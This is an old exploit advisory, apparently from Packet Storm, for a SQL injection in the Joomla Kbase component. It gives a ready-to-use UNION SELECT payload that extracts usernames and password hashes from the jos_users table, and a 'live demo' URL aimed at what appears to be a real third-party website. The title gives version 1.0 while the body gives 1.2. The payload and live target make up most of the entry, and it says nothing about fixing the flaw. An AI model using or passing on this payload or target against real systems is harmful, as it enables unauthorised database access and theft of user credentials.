Joomla Kbase 1.0 SQL Injection

2008-10-24T00:00:00
ID PACKETSTORM:71198
Type packetstorm
Reporter Valon Kerolli
Modified 2008-10-24T00:00:00

Description

                                        
                                            `#############################################################################  
# #  
# Joomla Component Kbase SQL Injection Vulnerability #  
# #  
#############################################################################  
  
  
########################################  
  
[~] Vulnerability found by: Valon Kerolli  
[~] Contact: valon[at]itshqip.com  
[~] Site: www.itshqip.com  
  
########################################  
  
[~] ScriptName: "Joomla"  
[~] Component: "Kbase (com_kbase)"   
[~] Version: "1.2"  
[~] Date: "?.?.2008"  
[~] Author: "John Messingham Development Services"  
[~] Author E-mail: "mail@jmds.eu"  
[~] Author URL: "www.jmds.eu"  
  
########################################  
  
[~] Exploit: /index.php?option=com_kbase&view=article&id=[SQL]  
  
[~] Example: /index.php?option=com_kbase&view=article&id=-1+union+select+1,concat(username,char(58),password)KHG,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+jos_users--  
  
########################################  
  
[~] Live Demo: http://netserv.ncesd.org/index.php?option=com_kbase&view=article&id=-1+union+select+1,concat(username,char(58),password)KHG,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+jos_users--  
  
########################################  
`